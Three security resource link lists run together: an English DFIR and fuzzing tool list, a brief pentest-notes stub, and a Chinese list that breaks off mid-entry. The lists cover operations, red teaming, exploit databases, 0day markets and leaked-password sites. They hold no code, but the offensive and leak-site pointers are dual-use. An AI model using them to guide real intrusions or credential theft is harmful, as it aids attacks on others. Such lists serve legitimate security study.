[Virustotal](https://www.virustotal.com/gui/) - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. * [Visualize_Logs](https://github.com/keithjjones/visualize_logs) - Open source. Visualization library and command line tools for logs. #### Timeline tools * [Highlighter](https://www.fireeye.com/services/freeware/highlighter.html) - Free Tool available from Fire/Mandiant that will depict log/text file that can highlight areas on the graphic, that corresponded to a key word or phrase. Good for time lining an infection and what was done post compromise. * [Morgue](https://github.com/etsy/morgue) - A PHP Web app by Etsy for managing postmortems. * [Plaso](https://github.com/log2timeline/plaso) - a Python-based backend engine for the tool log2timeline. * [Timesketch](https://github.com/google/timesketch) - open source tool for collaborative forensic timeline analysis. #### Windows Evidence Collection * [AChoir](https://github.com/OMENScan/AChoir) - Achoir is a framework/scripting tool to standardize and simplify the process of scripting live acquisition utilities for Windows. * [Binaryforay](https://binaryforay.blogspot.com/p/software.html) - list of free tools for win forensics. * [Crowd Response](https://www.crowdstrike.com/resources/community-tools/) - Crowd Response by CrowdStrike is a lightweight Windows console application designed to aid in the gathering of system information for incident response and security engagements. It features numerous modules and output formats. * [FastIR Collector](https://github.com/SekoiaLab/Fastir_Collector) - FastIR Collector is a tool that collects different artefacts on live Windows systems and records the results in csv files. With the analyses of these artefacts, an early compromise can be detected. * [FECT](https://github.com/jipegit/FECT) - Fast Evidence Collector Toolkit, FECT, is a light incident response toolkit to collect evidences on a suspicious Windows computer. Basically it is intended to be used by non-tech savvy people working with a journeyman Incident Handler. * [Fibratus](https://github.com/rabbitstack/fibratus) - tool for exploration and tracing of the Windows kernel. * [IREC](https://binalyze.com/irec/) - All-in-one IR Evidence Collector which captures RAM Image, $MFT, EventLogs, WMI Scripts, Registry Hives, System Restore Points and much more. It is FREE, lightning fast and easy to use. * [IOC Finder](https://www.fireeye.com/services/freeware/ioc-finder.html) - IOC Finder is a free tool from Mandiant for collecting host system data and reporting the presence of Indicators of Compromise. Support for Windows only. * [LOKI](https://github.com/Neo23x0/Loki) - Loki is a free IR scanner for scanning endpoint with yara rules and other indicators. * [Panorama](https://github.com/AlmCo/Panorama) - Fast incident overview on live Windows systems. * [PowerForensics](https://github.com/Invoke-IR/PowerForensics) - Live disk forensics platform, using PowerShell. * [PSRecon](https://github.com/gfoss/PSRecon/) - PSRecon gathers data from a remote Windows host using PowerShell](v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally. * [RegRipper](https://github.com/keydet89/RegRipper3.0) - Regripper is an open source tool, written in Perl, for extracting/parsing information, keys, values, and data from the Registry and presenting it for analysis. * [TRIAGE-IR](https://code.google.com/archive/p/triage-ir/) - Triage-IR is a IR collector for Windows. #### Other * [BruteX Wordlists](https://github.com/coreb1t/BruteX/tree/master/wordlists) - Wordlist repo. * [Cortex](https://thehive-project.org) - Cortex allows you to analyze observables such as IP and email addresses, URLs, domain names, files or hashes one by one or in bulk mode using a Web interface. Analysts can also automate these operations using its REST API. * [Crits](https://crits.github.io/) - a web-based tool which combines an analytic engine with a cyber threat database . * [Diffy](https://github.com/Netflix-Skunkworks/diffy) - a DFIR tool developed by Netflix's SIRT that allows an investigator to quickly scope a compromise across cloud instances (Linux instances on AWS, currently) during an incident and efficiently triaging those instances for followup actions by showing differences against a baseline. * [domfind](https://github.com/diogo-fernan/domfind) - domfind is a Python DNS crawler for finding identical domain names under different TLDs. * [Fenrir](https://github.com/Neo23x0/Fenrir) - Fenrir is a simple IOC scanner. It allows scanning any Linux/Unix/OSX system for IOCs in plain bash. Created by the creators of THOR and LOKI. * [Fileintel](https://github.com/keithjjones/fileintel) - Pull intelligence per file hash. * [fuzzbox](https://github.com/iSECPartners/fuzzbox/) - Multi-codec media fuzzing tool. * [Google Hacking Master List](https://gist.github.com/cmartinbaughman/5877945) * [HELK](https://github.com/Cyb3rWard0g/HELK) - Threat Hunting platform. * [Hindsight](https://github.com/obsidianforensics/hindsight) - Internet history forensics for Google Chrome/Chromium. * [honggfuzz](https://github.com/google/honggfuzz/) - Security orientated fuzzing tool. * [Hostintel](https://github.com/keithjjones/hostintel) - Pull intelligence per host. * [imagemounter](https://github.com/ralphje/imagemounter) - Command line utility and Python package to ease the (un)mounting of forensic disk images. * [Kansa](https://github.com/davehull/Kansa/) - Kansa is a modular incident response framework in Powershell. * [Kayak Car Hacking Tool](https://github.com/ParrotSec/car-hacking-tools) - Tool for Kayak car hacking. * [melkor-android](https://github.com/anestisb/melkor-android/) - Android fuzzing tool for ELF file formats. * [Netzob](https://github.com/netzob/netzob/) - Multipurpose tool for reverse engineering, modeling, and fuzzing communciation protocols. * [radamsa](https://gitlab.com/akihe/radamsa) - General purpose fuzzing tool. * [RaQet](https://www.raqet.org/) - RaQet is an unconventional remote acquisition and triaging tool that allows triage a disk of a remote computer (client) that is restarted with a purposely built forensic operating system. * [rastrea2r](https://github.com/aboutsecurity/rastrea2r) - allows one to scan disks and memory for IOCs using YARA on Windows, Linux and OS X. * [ROPgadget](https://github.com/JonathanSalwan/ROPgadget/) - Python based tool to aid in ROP exploitation. * [Shellen](https://github.com/merrychap/shellen) - Interactive shellcoding environment. * [sqhunter](https://github.com/0x4d31/sqhunter) - a threat hunter based on osquery and Salt Open (SaltStack) that can issue ad-hoc or distributed queries without the need for osquery's tls plugin. sqhunter allows you to query open network sockets and check them against threat intelligence sources. * [Stalk](https://www.percona.com/doc/percona-toolkit/2.2/pt-stalk.html) - Collect forensic data about MySQL when problems occur. * [Stenographer](https://github.com/google/stenographer) - Stenographer is a packet capture solution which aims to quickly spool all packets to disk, then provide simple, fast access to subsets of those packets. It stores as much history as it possible, managing disk usage, and deleting when disk limits are hit. It's ideal for capturing the traffic just before and during an incident, without the need explicit need to store all of the network traffic. * [Sulley](https://github.com/OpenRCE/sulley/) - Fuzzing engine and framework. * [traceroute-circl](https://github.com/CIRCL/traceroute-circl) - traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT team have to handle incidents based on IP addresses received. Created by Computer Emergency Responce Center Luxembourg. * [Zulu](https://github.com/nccgroup/Zulu/) - Interactive fuzzer. ### Our Open Source Tools * [Legion](https://github.com/GoVanguard/legion) - Legion is an open source, easy-to-use, super-extensible and semi-automated network penetration testing tool that aids in discovery, reconnaissance and exploitation of information systems. * [SecretScanner](https://github.com/GoVanguard/SecretScanner) - Searches for common keys and secrets in a stupidly simple way. * [SecretSearcher](https://github.com/GoVanguard/SecretSearcher) - Python re-implementation of the classic SecretScanner shell script. * [log4jShell Scanner](https://github.com/GoVanguard/Log4jShell_Scanner) - This shell script scans a vulnerable web application that is using a version of apache-log4j < 2.15.0. * [WinPrivHeadStart](https://github.com/GoVanguard/script-win-privescalate-headstart) - The lazy mans local Windows privilege escalation script. ### License [![CC-BY](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/by.svg)](https://creativecommons.org/licenses/by/4.0/) This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
## Pentest and bugbounty tools Useful things from my pentest-learning-OSCP-failing-brickwall-headbutting journey [Pentest tools list](https://github.com/6x86/tools/blob/master/pentest_tools.md) \ [Pentest commands list](https://github.com/6x86/tools/blob/master/pentest_commands.md) - not as organised as I'd like. \ Bug bounty tools list - ~~second~~ third job, after getting to grips with markdown!
***项目简介*** 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 *** # 安全相关资源列表 - https://arxiv.org 康奈尔大学(Cornell University)开放文档 - https://github.com/sindresorhus/awesome awesome系列 - http://www.owasp.org.cn/owasp-project/owasp-things OWASP项目 - http://www.irongeek.com/i.php?page=security/hackingillustrated 国内外安全大会相关视频与文档 - https://github.com/knownsec/KCon KCon大会文章PPT - https://github.com/SecWiki/sec-chart 安全思维导图集合 - https://github.com/Mayter/sec-charts 在sec-wiki的思维导图加上作者收藏 - https://github.com/Ascotbe/Osmographic-brain-mapping 安全思维脑图。ctf/web/二进制/ai/区块链/业务/主机/社工/移动/无线/运维/风控 - https://github.com/knownsec/RD_Checklist 知道创宇技能列表 - https://github.com/ChrisLinn/greyhame-2017 灰袍技能书2017版本 - https://github.com/evilcos/papers 余弦关于网络空间文章分享 - https://github.com/k4m4/movies-for-hackers 安全相关电影 - https://github.com/Hack-with-Github/Awesome-Hacking GitHub万星推荐:黑客成长技术清单 - https://github.com/tom0li/collection-document 安全部/攻防/内网/Web/apt//漏洞预警/开发/Bug Bounty/SDL/SRC - https://github.com/secure-data-analysis-data-sharing/data-analysis 资料分为安全态势、攻防对抗、数据分析、威胁情报、应急响应、物联网安全、企业安全建设、其他书籍八部分 - https://github.com/hongriSec/AI-Machine-Learning-Security 机器学习算法、AI模型、渗透测试工具 ## 安全建设 - https://www.nist.gov/topics/cybersecurity 美国国家标准与技术研究院。NVD漏洞库 - https://www.mitre.org/publications/all mitre安全机构。CVE漏洞库 - https://www.alibabacloud.com/blog 阿里 - https://security.tencent.com/index.php/blog 腾讯 - https://github.com/baidu-security 百度 - https://blogs.cisco.com/tag/ios-security 思科网络设备操作维护系统IOS(互联网操作系统Internetwork Operating System) - https://ai.google/research/pubs/?area=SecurityPrivacyandAbusePrevention 谷歌 - https://aws.amazon.com/cn/blogs/security/ 亚马逊 - https://code.fb.com/category/security/ Facebook - http://www.freebuf.com/articles/ics-articles/178822.html 浅析煤炭企业如何进行工控安全建设 - https://www.sec-un.org/金融业企业安全建设之路/ 金融业企业安全建设之路。聂军 - http://paper.tuisec.win/detail/34ab12018f71e71 个人总结的漏洞管理流程分享 - https://www.secrss.com/articles/4088 安全资产管理中容易被忽视的几点。聂军 - https://github.com/xdite/internet-security 互联网金融企业安全与风控的实战手册。资安风控 ### 产品设计原型 - https://www.fireeye.com/cyber-map/threat-map.html FireEye公司“网络威胁地图” - https://cybermap.kaspersky.com/ 卡巴斯基(Kaspersky)的“网络实时地图” - http://www.digitalattackmap.com/ Arbor networks的由全球270个ISPs匿名分享流量的“数字攻击地图” - https://hubble.nexusguard.com Nexusguard Hubble攻击地图 - https://echarts.baidu.com/examples/index.html#chart-type-globe Echart图 - https://book.yunzhan365.com/dksd/oyru/mobile/index.html 基于攻击链的网络威胁捕猎架构设计 - http://www.colasoft.com.cn/download/network-defense-map-2018.pdf 科来网络攻击与防范图谱 - https://www.anquanke.com/post/id/178339 漏扫动态爬虫实践。pyppeteer - https://www.jianshu.com/p/1ea9845b9f1d 使用Airtest超快速开发App爬虫 - https://www.jianshu.com/p/852e0fbe2f4c 安全产品厂商分类 - https://github.com/xianlimei/yiwei.github.io/wiki 私有云、区块链、rasp、waf、主机安全、堡垒机、应急响应中心、数据库安全防护、流量镜像。相关产品说明 ### 产品设计文档 - https://www.freebuf.com/sectool/135032.html 构建一个高交互型的难以发现的蜜罐 - https://bloodzer0.github.io/ossa/ OSSA,利用开源文件进行开源安全架构.主机、扫描器、端口、日志、防护设备等 - https://github.com/dvf/blockchain 用Python从零开始创建区块链 - https://github.com/crazywa1ker/DarthSidious-Chinese 从0开始你的域渗透之旅。DarthSidious 中文版 - https://paper.seebug.org/772/ 如何使用 KittyFuzzer 结合 ISF 中的工控协议组件对工控协议进行 Fuzz - https://paper.seebug.org/913/ 如何打造自己的PoC框架-Pocsuite3-框架篇。simple ## 安全运维 - https://github.com/aqzt/kjyw 快捷运维,代号kjyw,项目基于shell、python,运维脚本工具库,收集各类运维常用工具脚本,实现快速安装、快速配置策略等。安全专题 - https://github.com/aqzt/sso 服务器安全运维规范(Server security operation) - https://github.com/imthenachoman/How-To-Secure-A-Linux-Server Linux服务器保护。9k - https://github.com/SwiftOnSecurity/sysmon-config sysmon配置文件安装 - http://www.freebuf.com/articles/network/169632.html 开源软件创建SOC的一份清单 ### 安全配置基线 - https://www.cisecurity.org/cis-benchmarks/ CIS总结的140多种配置基准 - https://github.com/Jsitech/JShielder linux下服务器一键加固脚本 - https://github.com/trimstray/linux-hardening-checklist Linux服务器加固基线 - https://github.com/a13xp0p0v/kconfig-hardened-check 用于检查 Linux 内核配置中的安全加固选项的脚本 - https://github.com/wstart/DB_BaseLine 数据库基线检查工具 - https://github.com/drduh/macOS-Security-and-Privacy-Guide PY.MacOS安全性基线 ### nginx运维 - https://github.com/trimstray/nginx-admins-handbook nginx操作手册。8k - https://github.com/valentinxxx/nginxconfig.io/ 在线nginx配置文件生成,demo网址https://nginxconfig.io ### 应急响应 - https://www.secrss.com/articles/10986 一次攻防实战演习复盘总结。奇安信 - https://github.com/Bypass007/Emergency-Response-Notes 应急响应实战笔记。应急响应/日志分析/僵木蠕分析。1.1k。 - https://github.com/tide-emergency/yingji PY2.查看主机状态/启动项/历史命令/用户特权/文件修改/异常IP等 - https://github.com/trimstray/iptables-essentials IP table常见防火墙规则与命令 - https://github.com/ppabc/cc_iptables 收集处理DDOS、CC攻击各类脚本,包括NGINX日志中的CC攻击IP处理。 ### 勒索病毒 - https://github.com/jiansiting/Decryption-Tools 勒索病毒解决方案汇总 - https://www.nomoreransom.org 在线勒索病毒解决方案 ### 安全服务checklist - https://github.com/juliocesarfort/public-pentesting-reports 由几家咨询公司和学术安全组织发布的公共渗透测试报告的列表。 - http://pentestmonkey.net/category/cheat-sheet 渗透测试常见条目 - https://mp.weixin.qq.com/s/O36e0gl4cs0ErQPsb5L68Q 区块链,以太坊智能合约审计 CheckList - https://github.com/slowmist/eos-bp-nodes-security-checklist 区块链,EOS bp nodes security checklist(EOS超级节点安全执行指南) - https://github.com/0xRadi/OWASP-Web-Checklist owasp网站检查条目 - https://github.com/GitGuardian/APISecurityBestPractices api接口测试checklist - https://xz.aliyun.com/t/2089 金融科技SDL安全设计checklist ### 安全开发 - https://github.com/FallibleInc/security-guide-for-developers 安全开发规范 - https://www.securitypaper.org/ SDL开发安全生命周期管理 - https://github.com/shieldfy/API-Security-Checklist api开发核对清单。12k。 ## 安全指导手册使用手册 - https://github.com/HarmJ0y/CheatSheets 多个项目的速查手册(Beacon / Cobalt Strike,PowerView,PowerUp,Empire和PowerSploit) - https://www.cnblogs.com/backlion/p/10616308.html Coablt strike官方教程中文译版本 - https://github.com/aleenzz/Cobalt_Strike_wiki Cobalt Strike系列教程。0.5k。 - https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版 - https://github.com/louchaooo/kali-tools-zh kali下工具使用介绍手册 - https://www.offensive-security.com/metasploit-unleashed/ kali出的metasploit指导笔记 - http://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/ hydra使用手册 - https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南 - https://zhuanlan.zhihu.com/p/26618074 Nmap扩展脚本使用方法 - https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门 - https://wizardforcel.gitbooks.io/asani/content 浅入浅出Android安全 中文版 - https://wizardforcel.gitbooks.io/lpad/content Android 渗透测试学习手册 中文版 ### 安全基础文章博客 - https://book.yunzhan365.com/umta/rtnp/mobile/index.html 网络安全科普小册子 - https://book.yunzhan365.com/ybab/exnz/mobile/index.html FP50 优秀网络安全解决方案 白皮书 - http://sec.cuc.edu.cn/huangwei/textbook/ns/ 网络安全电子版教材。中传信安课程网站 - https://space.bilibili.com/37422870 入门安全视频 - https://ilearningx.huawei.com/portal/#/portal/EBG/26 华为e学云。安全科普 - https://github.com/tiancode/learn-hacking 网络安全入门文章集 - https://www.lshack.cn 工控安全入门 - https://keenlab.tencent.com/zh/index.html 腾讯科恩实验室 - https://www.freebuf.com/articles/neopoints/190895.html 入门介绍。fuzz/漏挖/脚本 - https://github.com/ym2011/SecurityManagement 分享安全管理体系、ISO27001、等级保护、安全评审的经验 - http://topspeedsnail.com 常见的wifi破解、网站扫描技术演示 - https://lcx.cc NuclearAtk核总。文章/工具 - https://cn0xroot.com/ 雪碧。通信硬件 - https://null-byte.wonderhowto.com msf/fb/wifi/pass/取证/social/信息收集 ### Offensive Security全家桶 - https://github.com/b1n4ry4rms/RedTeam-Pentest-Cheatsheets/ 常见工具命令 #### OSCP渗透测试 - https://github.com/anandkumar11u/OSCP-60days OSCP All Tools - https://github.com/neal1991/OSCP_learing oscp learning。tools、command - https://github.com/foobarto/redteam-notebook OSCP-EXAM 红队标准渗透测试流程+常用命令 - https://github.com/gajos112/OSCP OSCP-EXAM - https://github.com/RustyShackleford221/OSCP-Prep OSCP-EXAM - https://github.com/lsh4ck/oscp oscp历程。lshack.cn备战 - https://0xdarkvortex.dev/index.php/2018/04/17/31-days-of-oscp-experience/ 31 days of OSCP Experience ### OSCE漏洞挖掘 - https://www.freebuf.com/news/206041.html 中文首发丨OSCE(Offensive Security Certified Expert)考证全攻略 - https://github.com/ihack4falafel/OSCE # - https://github.com/dhn/OSCE # - https://github.com/73696e65/windows-exploits # ## 数据分析 - http://pandas.pydata.org 数据分析 - https://github.com/r0f1/datascience 大数据分析功能库推荐 - https://github.com/Xyntax/slides/ 安全数据分析/DNS恶意流量分析/威胁防御 ## 情报分析 - http://dingba.top/qqzk 全球智库 - http://snap.stanford.edu 斯坦福公开数据集。人口/社交/等 - http://s3.amazonaws.com/alexa-static/top-1m.csv.zip Alexa网站流量综合排名一万 - https://github.com/BuzzFeedNews 网络数据集集合 - http://cdn.databases.today;www.databases.today;publicdbhost.dmca.gripe;www.wttech.org;hashes.org/leaks.php;rchive.org/search.php?query=;https://weleakinfo.com 密码泄露 - https://opendata.rapid7.com Rapid7 OpenData。包含dns/ssl/http/udp/tcp各种数据包记录。greatjob。 - https://www.i-intelligence.eu 情报收集组织。开源情报工具和资源手册2018版(open source intelligence tools and resources handbook) - https://www.start.umd.edu/gtd/ 全球恐怖主义动向数据库官网 - https://osint.link Open Source Intelligence (OSINT) Tools & Resources。关键词/搜索引擎/元数据/ftp/文件/图片/视频/Iot/新闻/商业/pastebin - https://github.com/Te-k/harpoon PY.基于osint的威胁情报命令行工具 - https://github.com/needmorecowbell/sniff-paste 针对 Pastebin 的开源情报收集工具 - https://trumail.io/ 验证对方邮箱是否为垃圾邮箱,每个月可以免费验证1000次 - https://avoidaclaim.com/fraud-warnings/ 诈骗信息公示 - http://www.payer.org/test/ 恶意邮件地址电话公式 - https://github.com/ChrisJohnRiley/Scythe 验证账号是否为常用账号 - https://github.com/fireeye/GeoLogonalyzer 远程身份验证地理位置分析工具,用于区分合法登录和恶意登录。 - https://github.com/threathunterX/nebula LUA\PERL,威胁猎人开源"星云"业务风控系统 - https://github.com/momosecurity/aswan PY.陌陌风控系统静态规则引擎,零基础简易便捷的配置多种复杂规则,实时高效管控用户异常行为。 ### IP地理库 - https://dev.maxmind.com/geoip/geoip2/geolite2/ geoip2全球IPV4 - https://www.ipip.net IPV4.商业版 - https://www.ipplus360.com IPV4/IPV6。商业版 ### 威胁源情报 - https://github.com/OpenCTI-Platform/opencti JS.网络威胁情报平台 - https://www.threatcrowd.org/ 威胁情报分析平台。ti.qianxin.com;feed.watcherlab.com;x.threatbook.cn。 - https://intel.criticalstack.com Intel威胁情报库,恶意IP地址,集成bro - https://talosintelligence.com/documents/ip-blacklist 恶意IP地址 - https://ransomwaretracker.abuse.ch/downloads/RW_IPBL.txt 恶意软件IP地址 - https://github.com/fox-it/cobaltstrike-extraneous-space/blob/master/cobaltstrike-servers.csv CobaltStrike服务端IP地址 - https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1 洋葱路由出口节点 - https://isc.sans.edu/api/threatlist/shodan shodan撒旦扫描器节点 - https://github.com/ReAbout/datacon DataCon-方向三-攻击源与攻击者分析-writeup - https://github.com/t4d/StalkPhish PY.钓鱼网站情报多源收集,包含urlscan.io;urlquery.net;phishtank.com;openphish.com。 ### APT威胁情报 - https://github.com/blackorbird/APT_REPORT apt组织报告与公开文件 - https://github.com/Yeti-791/APT-Guide apt组织分析文档 - https://git.laucyun.com/security/APT34 APT34/OILRIG 资源文档文件泄露 - https://ht.transparencytoolkit.org Hacking Team 400G泄露 - https://pan-unit42.github.io/playbook_viewer/ 针对apt组织的威胁情报汇总 - https://twthu.co/ apt组织威胁情报站 ## 攻防技术资源 - https://attack.mitre.org mitre科技机构对攻击技术的总结wiki。攻击矩阵模型。翻译 - https://github.com/infosecn1nja/awesome-mitre-attack Mitre ATT&CK™框架资源收集 - https://huntingday.github.io MITRE | ATT&CK 中文站 - https://micropoor.blogspot.com/2019/01/php8.html PHP安全新闻早8点课程系列高持续渗透--Microporor - https://github.com/Micropoor/Micro8 Microporor高级攻防100课 - https://github.com/maskhed/Papers 包含100课等经典攻防教材、安全知识 - https://github.com/infosecn1nja/AD-Attack-Defense AD活动目录攻击链与防御 - https://github.com/jeansgit/RedTeam RedTeam资料收集整理。红蓝对抗资料分享,红蓝对抗相关图片,内网安全渗透总结 - https://github.com/Snowming04/The-Hacker-Playbook-3-Translation [译] 渗透测试实战第三版(红队版)The Hacker Playbook 3 - https://github.com/yeyintminthuhtut/Awesome-Red-Teaming 优秀红队资源列表 - https://github.com/kbandla/APTnotes 各种公开的文件和相关的APT笔记,还有软件样本 - https://github.com/Kinimiwar/Penetration-Testing 渗透测试方向优秀资源收集 - https://github.com/jshaw87/Cheatsheets 渗透测试/安全秘籍/笔记 - http://www.pentest-standard.org/index.php/Pre-engagement 渗透测试标准-渗透项目实施前的互动。项目实施前 - https://github.com/nccgroup 国外安全咨询团队,burp插件的编写、内网利用工具、app安全工具 - https://github.com/r35tart/Penetration_Testing_Case 攻防测试案例 - https://somdev.me/21-things-xss/ XSS的21个扩展用途 - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ sql注入sheet表 - https://sqlwiki.netspi.com/ 你要的sql注入知识点都能找到 - https://github.com/kevins1022/SQLInjectionWiki 一个专注于聚合和记录各种SQL注入方法的wiki - http://blog.safebuff.com/2016/07/03/SSRF-Tips/ ssrf漏洞利用手册 ### 社工综合利用 - https://www.freebuf.com/articles/102500.html 黑客讲述渗透Hacking Team全过程(详细解说) - https://github.com/myselfexplorer/hackingLibrary 社工大佬的笔记手册 - https://payloads.online/archivers/2019-05-21/1 鱼叉攻击-尝试。倾旋 ### Web漏洞攻防 - https://wizardforcel.gitbooks.io/web-hacking-101/content Web Hacking 101 中文版 - https://websec.readthedocs.io/zh/latest/ Web安全学习笔记 - https://techvomit.net/web-application-penetration-testing-notes/ web渗透测试笔记 - https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表 - https://www.lynda.com/JavaScript-tutorials/What-server-side-JavaScript-injection-SSJI/797717/5025838-4.html SSJI服务的JavaScript注入 - https://www.imperva.com/blog/nosql-ssji-authentication-bypass/ SSJI服务的JavaScript注入 ### 内网安全后渗透 - https://attack.mitre.org/wiki/Lateral_Movement mitre机构对横向移动的总结 - https://adsecurity.org Active Directory安全攻防 - https://github.com/Ridter/Intranet_Penetration_Tips 信息收集/内网渗透TIPS - https://payloads.online/archivers/2018-11-30/1 彻底理解Windows认证 - 议题解读。倾旋 - https://github.com/klionsec/klionsec.github.io 内网大牛的学习历程 - https://github.com/l3m0n/pentest_study 从零开始内网渗透学习 - https://3gstudent.github.io 域渗透/DNS/可信目录/横向移动 - https://3gstudent.github.io/3gstudent.github.io/通过模拟可信目录绕过UAC的利用分析/ - https://www.4hou.com/technology/16713.html 通过模拟可信目录绕过UAC的利用分析 - https://www.4hou.com/technology/16882.html 模拟可信目录的利用技巧扩展 - https://blog.riskivy.com/exchange-server-in-pentest/ 深入Exchange Server在网络渗透下的利用方法 - https://evi1cg.me/archives/Exchange_Hack.html Exchange在渗透测试中的利用 - https://www.anquanke.com/post/id/87976 Powershell攻击指南黑客后渗透之道系列——基础篇 - https://www.anquanke.com/post/id/88851 Powershell攻击指南黑客后渗透之道系列——进阶利用 - https://www.anquanke.com/post/id/89362 Powershell攻击指南黑客后渗透之道系列——实战篇 - https://www.4hou.com/penetration/18447.html 域渗透——利用dnscmd在DNS服务器上实现远程加载Dll ## 漏洞挖掘复现分析 - https://github.com/ngalongc/bug-bounty-reference 漏洞挖掘write-up - https://github.com/1hack0/bug-bounty-101 挖洞技术手册 - https://github.com/writeups/ios ios漏洞writeup笔记 - https://github.com/userlandkernel/plataoplomo Sem Voigtländer 公开其发现的 iOS 中各种漏洞,包括(Writeup/POC/Exploit) - https://github.com/Ivan1ee/NET-Deserialize .Net反序列化漏洞 - https://www.exploit-db.com 美国Offensive Security的漏洞库。kali团队,自带poc/exp,MSF插件 - https://bugreader.com 国外知名厂商公开漏洞详情 - https://blog.intigriti.com intigriti公司bug bounty文章和公开漏洞详情 - https://hackerone.com/hacktivity HACKER ONE公开漏洞详情 - https://dvpnet.io/lddt DVP去中心化漏洞平台公开漏洞详情 - https://sec.ly.com/bugs 同程安全公开漏洞详情 - https://zeroday.hitcon.org/vulnerability/ 台湾公开漏洞库 ### 常用漏洞库/SEC/BugBounty - https://sploitus.com 公开漏洞搜索引擎。gOODjob。 - twitter搜索“#exploit”、“#0day”、“CVE RCE” # - https://github.com/raminfp/linux_exploit_development linux漏洞利用开发手册 - https://shuimugan.com 2016/06/24 13:25之前,乌云Drops文章,公开漏洞详情 - http://ics.cnvd.org.cn 中国国家工控漏洞库 - https://ics-cert.us-cert.gov/advisories 美国国家工控漏洞库 - http://www.nsfocus.net/index.php?act=sec_bug 绿盟漏洞库,含工控 - http://ivd.winicssec.com/ 威努特工控漏洞库 - http://cve.scap.org.cn/view/ics CVE中文工控漏洞库 - https://cve.mitre.org/cve/search_cve_list.html 美国MITRE公司负责维护的CVE漏洞库 - https://nvd.nist.gov/vuln/search 美国国家信息安全漏洞库 - https://exchange.xforce.ibmcloud.com IBM exchange漏洞库 - https://www.zerodayinitiative.com/ 设备(firmware)漏洞市场 - http://www.zerodium.com/ 灰色漏洞交易平台0day市场 - https://0day.today 漏洞市场 ### BugBounty文章 - https://github.com/xiangpasama/JDSRC-Small-Classroom 京东SRC小课堂系列文章 ### 学习靶场 - https://www.root-me.org 俄罗斯root me靶场,在线,免费 - https://www.hackthebox.eu 欧洲HTB靶场,代理模拟,在线,免费三个等级 - https://lab.pentestit.ru 俄罗斯靶场,代理模拟,在线,免费一个 - https://www.vulnhub.com 实验室、靶场、ctf靶机汇总,离线 - http://www.itsecgames.com bWAPP,包含 100多种漏洞环境 - https://www.offensive-security.com/information-security-certifications/ kali攻防技术认证。商业版 - https://www.pentesteracademy.com 攻防技术认证。商业版 - https://www.cybrary.it 网络安全工程师认证。CTF/Labs - https://www.wechall.net 世界知名ctf汇总交流网站 - https://www.ichunqiu.com/experiment/direction i春秋实验室。Web/主机/应用/pwn教程 - https://www.mozhe.cn/bug 墨者学院在线靶场。Web/主机/数据库/取证 - https://adworld.xctf.org.cn XCTF攻防世界 - https://www.xssgame.com 谷歌XSS挑战 - http://xss.tv Web在线靶场 - https://github.com/bkimminich/juice-shop 常见web安全实验靶场市场 - https://github.com/ethicalhack3r/DVWA web安全实验靶场 - https://www.freebuf.com/articles/web/123779.html intro.新手指南:DVWA-1.9全级别教程 - https://github.com/78778443/permeate php.常见漏洞靶场 - https://github.com/gh0stkey/DoraBox php.常见漏洞靶场 - https://github.com/stamparm/DSVW PY2.常见漏洞靶场 - https://github.com/amolnaik4/bodhi PY.常见漏洞靶场 - https://github.com/Safflower/Solve-Me php.韩国一个偏代码审计的ctf靶场源码 - https://github.com/WebGoat/WebGoat JAVA.一键jar包web安全实验靶场 - https://github.com/Audi-1/sqli-labs PHP.基于SQLite的sql注入学习靶场 - https://github.com/lcamry/sqli-labs INTRO.通过sqli-labs演示mysql相关的注入手法 - https://github.com/c0ny1/upload-labs PHP.一个帮你总结所有类型的上传漏洞的靶场 - https://github.com/LandGrey/upload-labs-writeup INTRO.upload-labs指导手册 - https://github.com/Go0s/LFIboomCTF 本地文件包含漏洞&&PHP利用协议&&实践源码 - https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/ 一个虚拟机文件用于linux提权练习 - https://github.com/OWASP/igoat 适用于ios应用程序测试和安全性的学习工具 - https://github.com/prateek147/DVIA-v2 适用于ios应用程序测试和安全性的学习工具 - https://github.com/rapid7/metasploitable3 metasploit练习系统 - https://github.com/rapid7/metasploit-vulnerability-emulator perl.metasploit模拟环境,练习操作 - https://github.com/chryzsh/DarthSidious AD域环境的搭建、渗透、防护 - https://github.com/c0ny1/xxe-lab 一个包含php,JAVA.python,C#等各种语言版本的XXE漏洞Demo ### 漏洞复现 - https://github.com/vulhub/vulhub Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,执行两条命令即可编译、运行一个完整的漏洞靶场镜像.4k。 - https://github.com/Medicean/VulApps 收集各种漏洞环境,为方便使用,统一采用 Dockerfile 形式。同时也收集了安全工具环境。 - https://github.com/c0ny1/vulstudy 多种漏洞复现系统的docker汇总 - https://github.com/bingohuang/docker-labs 制作在线docker平台 ### Fuzzer模糊测试 - http://www.freebuf.com/articles/rookie/169413.html 一系列用于Fuzzing学习的资源汇总 - https://github.com/secfigo/Awesome-Fuzzing Fuzzing模糊测试相关学习资料 - https://github.com/fuzzdb-project/fuzzdb fuzz资料数据库 - https://github.com/googleprojectzero/winafl C.Google Project Zero 基于Windows AFL开发的模糊测试框架。原创技术分析 | AFL漏洞挖掘技术漫谈 - https://github.com/mxmssh/drAFL C.Linux二进制代码模糊测试 - https://github.com/k0keoyo/kDriver-Fuzzer C.基于ioctlbf框架编写的驱动漏洞挖掘工具kDriver Fuzzer - https://github.com/google/oss-fuzz C.Linux下的开源软件的模糊测试 - https://github.com/google/honggfuzz C.具有反馈驱动(Feedback-Driven)的持续性软件代码测试。2k。 - https://github.com/bunzen/pySSDeep 